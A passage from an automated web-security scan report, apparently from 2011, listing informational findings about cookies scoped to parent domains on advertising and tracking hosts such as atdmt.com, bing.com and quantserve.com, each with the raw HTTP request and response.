Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: image/gif
Set-Cookie: aud=ABR4nGNgYGDw07pwjIGB0TDcvq2cwYqBQUCpgaEBKN4LpnguQ6ibYIq%2FEkwxr4HwqsCUaCKESoAI%2FgVTHEZgSuwxmOKaAabEC8CUyDmISjcwxRcGUfkJTPF%2Bg%2FAgFokegvCKII54D1HyB0yxSoEpwa8QlTshcswQ3i4ItQeivRPC2w%2FhdUNUSkMEF0KM5oO4E%2BJcMXEGEBC6BgkJiLVsvGBK4j6ECgRTkk4QyhHiFVGIN%2FeBKYHjYEroGYQqhhi9BcIrgahUhbjFFOKVAxDBVRC3%2BEMs8gJSAMzIYGs%3D; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FrQvH%2Fq95EMvAwGgYbt9WDhJj4BP43sbEwCD5WvA%2FiOsJpBkZGIEMxj8M6v67ihgZmDgYGIBiIEFG%2F10lqAIC33ajCiRUWDLDjYNJIBkLtAtosozAt6s4bRX4oY5TLqEihDjjT%2BEyQiahogrdyTXoAlnoAql4jEtBVczgI%2Fh9NtCRSvPP%2F2cECpwF0iAJydcC%2F8EqlMLOZLMAxVdMBhsn2cAAkme0ANIg9V8g%2FEAVJ2a4IkZLVEmtPaa4JdOqAkDGQzhQazGMDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRVPAIakEpIGScJPA6QFNEyMsLTBC0wkjMOEoAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwBC9DUP; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
Set-Cookie: OAID=aa8272d1805895ab786afc266fb574e9; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Content-Length: 49
Connection: close

GIF89a...................!.......,...........T..;

10.42. http://bh.contextweb.com/bh/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

V=3Xw5Pjg54vjm; Domain=.contextweb.com; Expires=Sun, 15-Jul-2012 18:42:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/getuid?url=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODI1JnRsPTQzMjAw&piggybackCookie=%%CWGUID%%,User_tokens:%%USER_TOKENS%% HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: FC1-WCR=^108044_1_2R5ws; FC1-WC=^55430_1_2TBon; V=3Xw5Pjg54vjm; pb_rtb_ev=1:535039.0892d3fc-c93f-4985-8ab2-420c545c19b6.0|534301.ae88d41d-10d2-4208-85c9-65e00de29834.0|537583.58d1d589-451b-4796-8696-57c9a840b1c6.0|536088.4612530447660445644.0|530739.4dc0222e-3ec1-3315-901d-9f5b34470a53.0|535461.4146544210108361256.0|534889.hryjysfdf0upy.0|535495.a2b4425a-b39e-11e0-9b08-00259031f86c.0|538303.x.0|531292.AA-00000001931708427.0; cwbh1=1443%3B08%2F20%2F2011%3BNETM7; C2W4=3MB3jbtPLrzTwrWU2ElD0c2P6KBbJOenvehA0Ose80qSqI4AvZjOa-g; vf=4

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=3Xw5Pjg54vjm; Domain=.contextweb.com; Expires=Sun, 15-Jul-2012 18:42:57 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODI1JnRsPTQzMjAw
Content-Type: text/plain
Content-Length: 0
Date: Thu, 21 Jul 2011 18:42:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

10.43. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=lHQFb8QE0aSM00001lHQEb8QF0aSM00001; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/
B3=al.q0000000002vH; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

10.44. http://c.atdmt.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Wed, 08-Feb-2012 02:08:47 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=msndn&form=MSSRPD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295:66c2/2b2a3; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27:d4250f2/2b2a3/13d2744e/66c2/4e262efc; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=E361C23374E642C998D8ABA7166A75EC&ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF%26E=b48%26W=1&NAP=V=1.9%26E=aee%26C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg%26W=1&cb=1cc48dd74eb6d20
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Wed, 08-Feb-2012 02:08:47 GMT; path=/;
Date: Sat, 23 Jul 2011 02:08:47 GMT
Content-Length: 0

10.45. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Wed, 08-Feb-2012 02:08:28 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=msndn&form=MSSRPD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _SS=SID=B8C6EB515AE04F898383683B7D3C2EF8; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c8b890481b4a848de957262672a125e92; SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Wed, 08-Feb-2012 02:08:28 GMT; path=/;
Date: Sat, 23 Jul 2011 02:08:28 GMT
Content-Length: 0

10.46. http://c.live.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.live.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=1A89D03C0A4769473AE9D2040E476929&TUID=1; domain=.live.com; expires=Wed, 08-Feb-2012 04:40:54 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=13263&wlxid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&reqid=0044657a12f&csiperf=nostart&r=0.14428236617817547 HTTP/1.1
Host: c.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://profile.live.com/cid-9c9838e8e958effe/
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=546; wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSw2OUY0MDAyQzdCNzk1M0EsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; E=P:nfgm1AkXzog=:2jcn3G4MS+FrpMyDTnadRXcrIv8hrFN/hTw6mIw1bLs=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=4; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=SN.Profile&FR=&ST=; LD=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32_0044657a12f_13263_1311396056071=L3146

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=13263&wlxid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&reqid=0044657a12f&csiperf=nostart&r=0.14428236617817547&RedC=c.live.com&MXFR=1A89D03C0A4769473AE9D2040E476929
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=1A89D03C0A4769473AE9D2040E476929&TUID=1; domain=.live.com; expires=Wed, 08-Feb-2012 04:40:54 GMT; path=/;
Date: Sat, 23 Jul 2011 04:40:53 GMT
Content-Length: 0

10.47. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljtrtb=eJyrVjJSslJyNXYzNnJyMbA0NTFztjRxcXSxNHUxdDI1MTA0NHBWqgUAp3QIqg%3D%3D; expires=Sun, 22-Jul-2012 04:49:16 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=E3F32BD09546C94DAD95D1B540110C HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=1311396557609b4824cb807cd&rand=1311396557610&uri=http://www.lijit.com/users/curse&informer=7713456&type=fpads&loc=http%3A%2F%2Fwww.curse.com%2F&rr=http%3A//c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html&ifr=1&v=1.0&csync=1
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D; tpro_inst=b25aa85a3e9390bd4920c9da2e048768; tpro=eJxNUNGOgyAQ%2FJd9Jg2IWvUL7h%2BaC6GISqJgQC9pjP9%2BuzTe9W1nYGZn9oA1hsHNFroDRut7G2laNDH8Ju8MBnuhWp4M9Jj%2FSiUK4rhgIBDcM6gQNEqWWdswkJUq2wxKBhVX67wngkWBTlGbbGX0bohsUaCHqPRyGevktEfAYHJpvdiwTZSSo4WZ3NxH68nGh5wRTV42L5G0xHkTlryGK8mJFpSLqzqDAnPVXAnO3wrMzz9i1rQjzLN9l%2FbB50OUzQeNEGuPUfcqmSmHrE%2FUJbdRjseRJ%2BjgKzyfL8BWG3RCCiHbuqrE%2Bf3XCO%2B%2BOQr7%2F8pgCb0yYfckYvBjY3IB%2B4K4cTjPX8H9e9I%3D; ljt_csync=dotomi%2Crtb_turn%2Crtb_simplifi%2C1

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:16 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n25 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sun, 24 Jul 2011 04:49:16 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslJyNXYzNnJyMbA0NTFztjRxcXSxNHUxdDI1MTA0NHBWqgUAp3QIqg%3D%3D; expires=Sun, 22-Jul-2012 04:49:16 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

10.48. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=1311255774.10R|1311255774.1FE|1311255774.19F|1311255774.1OD|1311255774.60|1311255774.1EY; Domain=.addthis.com; Expires=Mon, 22-Jul-2013 13:15:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=4&gen=1000&gen=100&sid=4e2ac965ab2b887f&callback=_ate.ad.hrr&pub=xa-4df2b5923111e1f2&uid=4e282ba90cea006f&url=http%3A%2F%2Fwww.seashepherd.org%2Fnews-and-media%2F2011%2F07%2F19%2Femergency-sos-from-captain-paul-watson-save-our-ship-1263&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&1dlzlkd HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh46.html
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4e282ba90cea006f; psc=4; di=%7B%7D..1311255774.10R|1311255774.1FE|1311255774.19F|1311255774.1OD|1311255774.60|1311255774.1EY; dt=X; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 23 Jul 2011 13:15:17 GMT
Set-Cookie: di=1311255774.10R|1311255774.1FE|1311255774.19F|1311255774.1OD|1311255774.60|1311255774.1EY; Domain=.addthis.com; Expires=Mon, 22-Jul-2013 13:15:17 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 22-Aug-2011 13:15:17 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 23 Jul 2011 13:15:16 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

10.49. http://clk.atdmt.com/goiframe/222276744/331989646/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/222276744/331989646/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=ceda/2b295:ceda/2b2a4; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a:d3fac88/2b2a4/13c9c28e/ceda/4e286642; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/222276744/331989646/direct;wi.160;hi.600/01 HTTP/1.1
Host: clk.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/331989646/direct;;wi.160;hi.600/01?click=
Cookie: AA002=1297100700-4279215; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; MUID=1FDD375D440B439987A467BECD35D2C6; ach00=ceda/2b295; ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoftstore.com?WT.mc_id=MSCOM_EN_US_DISPLAY_CAMPAIGN_121LMUS007393
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=ceda/2b295:ceda/2b2a4; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a:d3fac88/2b2a4/13c9c28e/ceda/4e286642; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 21 Jul 2011 17:47:46 GMT
Connection: close

10.50. http://clk.atdmt.com/goiframe/223672189/334126009/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/223672189/334126009/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=ceda/2b295; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/223672189/334126009/direct;wi.160;hi.600/01 HTTP/1.1
Host: clk.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/334126009/direct;;wi.160;hi.600/01?click=
Cookie: AA002=1297100700-4279215; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoftstore.com/store/msstore/html/pbPage.pcXboxOffer?WT.mc_id=MSCOM_EN_US_DISPLAY_CAMPAIGN_121LSUS008439
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=ceda/2b295; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

10.51. http://cms.quantserve.com/dpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/dpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ECgAFPaeApll_6ix7sIBpAEBpQeBkgoprR8sjB9uThwijEh-6RmBqyqBg5gc4V0eENEOENHLSUKIEPcOEQfIEZoQ5U8w0bswpeFAMFBIRfM9FOEA_VrB-JLzCEAMhLIQ_OHC; expires=Fri, 21-Oct-2011 14:52:39 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dpixel?eid=5&id=3420415245200633085 HTTP/1.1
Host: cms.quantserve.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/press
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=ECgAFPaeApll_6ix7sIBpAEBpQeBkg9JrRpMjB9uThwijEh-6RmBqyqBg5gc4V0eENEOENHLSUKIEPcOEQfIEZoQ5U8w0bswpeFAMFBIRfM9FOEA_VrB-JLzCEAMhLIQ_OHC

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=ECgAFPaeApll_6ix7sIBpAEBpQeBkgoprR8sjB9uThwijEh-6RmBqyqBg5gc4V0eENEOENHLSUKIEPcOEQfIEZoQ5U8w0bswpeFAMFBIRfM9FOEA_VrB-JLzCEAMhLIQ_OHC; expires=Fri, 21-Oct-2011 14:52:39 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
